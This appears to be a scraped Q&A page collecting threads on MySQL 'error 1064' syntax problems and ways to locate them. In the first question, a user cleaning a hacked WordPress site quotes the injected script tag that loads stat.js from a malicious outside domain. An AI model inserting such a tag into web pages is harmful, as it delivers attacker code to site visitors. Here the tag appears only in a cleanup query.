One of my clients has been hit by a SQL injection attack on his WordPress website. Now it's up to me to fix the mess. I barely have an understanding of SQL and PHP though so I am heavily reliant on Stackoverflow for advice. I couldn't however find the solution to my answer anywhere, including other websites.
The problem:
I'm trying to replace a string of text within a table column with nothing. I try to execute the following query however, it marks an error on the question mark. For some reason it counts it as a parameter and I do not understand why..
UPDATE wp_posts SET post_content = (REPLACE (post_content, “<script src=’https://js.donatelloflowfirstly.ga/stat.js?n=ns1’ type=’text/javascript’></script>”, ””));
Error message:
ERROR 1064 (42000): You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'src=’https://js.donatelloflowfirstly.ga/stat.js?n=ns1’ type=’text/javascri' at line 1
Could someone please advice me on how to fix the command or how to otherwise clean up the wordpress database from these scripts?
Thank you very much in advance!
Related
I'm trying to execute a .sql script which inserts values into a database.
Problem is, there's some issues in the syntax of the script.
Error Code: 1064. You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1 0.078 sec
But the script is pretty large, a few Mos, so I can't check manually where the error is. According to the error message it should be close to quotes, but sadly all the values inserted are on one line in the script file so the indication "on line 1" is not helpful at all.
Is there a way to get a precise position for the error ? I'd like, in particular, the column number where the syntax is wrong. Is that possible ?
I'm using command of the type :
mysql -u root -p Wikicategory < path\to\script\script.sql
MySQL Workbench uses a different parser (ANTLR4 based) than the MySQL server (yacc based). ANTLR4 based parsers often (but not always) can report errors with a precise location.
I don't think the query is too large. If it were you would get a different error (because the connection buffer would not be large enough).
So, you best option is to reformat the query. For SELECTs you can use MySQL Workbench, but better try Visual Studio Code with the SQLTools plugin. Not the best results there either, but it seems to be able to reformat all types of queries.
Then run the script again to see if you get a better error location.
I have a database connected to Unity through a php script. This script lets me register an account and set it on a row on the database. So whenever I make a new account it creates a new row in my "Users" table.
Now my problem is that I get an error whenever I try to edit or delete a row by clicking on the edit or delete icon in phpmyadmin. If i try to create a query manually it works in phpmyadmin, but the query that the phpmyadmin tries to execute when I click the icon isn't.
SQL query: Documentation Edit
SELECT * FROM `UserData`.`Users` WHERE ;
MySQL said: Documentation
#1064 - You have an error in your SQL syntax; check the manual that
corresponds to your MariaDB server version for the right syntax to use
near '' at line 1
When I try to manually execute the similar correct query it works fine:
SELECT * FROM `UserData`.`Users` WHERE ID = 1 ;
Does anyone know the cause of this problem or maybe know a fix for it?
My server version
I have the same problem, and the work around that worked for me was using the SQL shell tab with the corresponding SQL code for whatever I want to do - the error only occurs when I use the icons. Thus I think this must be a problem with the interface of phpmyadmin/icons. This is annoying, but at least I haven't lost my SQL library.
If anyone has a better solution, I'd be keen to know. (I'm using phpmyadmin 4.5.6.2 on a Mac Os X 10.10.2)
You have to rename your tables without capital letters. Name them like userdata or user and so on...
I am using MySQL 5.1.5 on a Yahoo Sight Server, with phpMyAdmin as the databse interface.
I use the following Query
UPDATE table_family SET last_name='Smith' WHERE id=1;
Then I get the following error:
Error There seems to be an error in your SQL query. The MySQL server
error output below, if there is any, may also help you in diagnosing
the problem
ERROR: Unknown Punctuation String # 34 STR: =\ SQL: UPDATE
table_family SET last_name=\'Smith\' WHERE id=1;
SQL query:
UPDATE table_family SET last_name=\'Smith\' WHERE id=1;
MySQL said: Documentation
1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use
near '\'Smith\' WHERE id=1' at line 1
Ideas? I feel like its an issue with the database, not with my code. the last_name field is a varchar(50). I actually opened a ticket with support on this issue, but it happened to me on two different domains I have with Yahoo, so that makes me think there is more than I know is going on. I have done this with integer fields that don't require the (') single quote and have had no issues. I have also run my syntax through a local access database I created just to make sure it wan't a syntax issue. Worked perfectly first time. Then I had 2 database guys I know look at it. They think its good too. So now I am lost.
Thanks for any help you can provide.
Andy
Is there somewhere you can input SQL to check syntax etc. because using it in Java just yields a really unhelpful error when trying to run the code: "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near..."?
http://www.sqlfiddle.com/
Seems like what you are after.
You can setup table structure in the left part of the window (CREATEs and INSERTs).
And try your desired SELECTS on the right
UPDATE: Though I might add to this that the error you are receiving is in fact an MySQL error you will encounter there as well, but fiddling around can be more handy in a separate tool.
Are you looking for Show Warning and Show Error
You can check here as well
You can check it in your phpmyadmin where you can just write and run the queries and see if it returns errors and/ or results.
You can also check your syntax at http://www.piliapp.com/mysql-syntax-check/
You can test your queries and also test if they return desired results at "http://www.martystepp.com/query/?username=cse154&password=cse154" this site provides test databases that are already built so you not only get the syntax right but it provides against logic errors.
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near [random snippet of query code]
I am very rarely able to deduce something of value from MySQL errors like that one, is there any way to get some more specific data?
I've seen people dismiss this question saying that it's impossible to get exact error data because of how MySQL's syntax works. Is that really so?
It's not only MySQL that gives syntax errors like that, MS SQL Server gives very similar messages.
The error message is very accurate in the sense that the code shown in the error message is the exact position where the parser determined that it could no longer go on with parsing the query.
However, the actual error in the query is often somewhat earlier in the query. If you for example misspelled "from" in a query as "fom", the parser will go on thinking that "fom" is an alias for the last field that came before that, and give you a syntax error when it finds a table name instead of the expected comma or "from" keyword. It will point to the table name as the position of the error instead of the misspelled keyword.
Sometimes it helps to break down your query into several lines instead of just one long one. This will still show you only the approximate position of your error, but it might help a bit.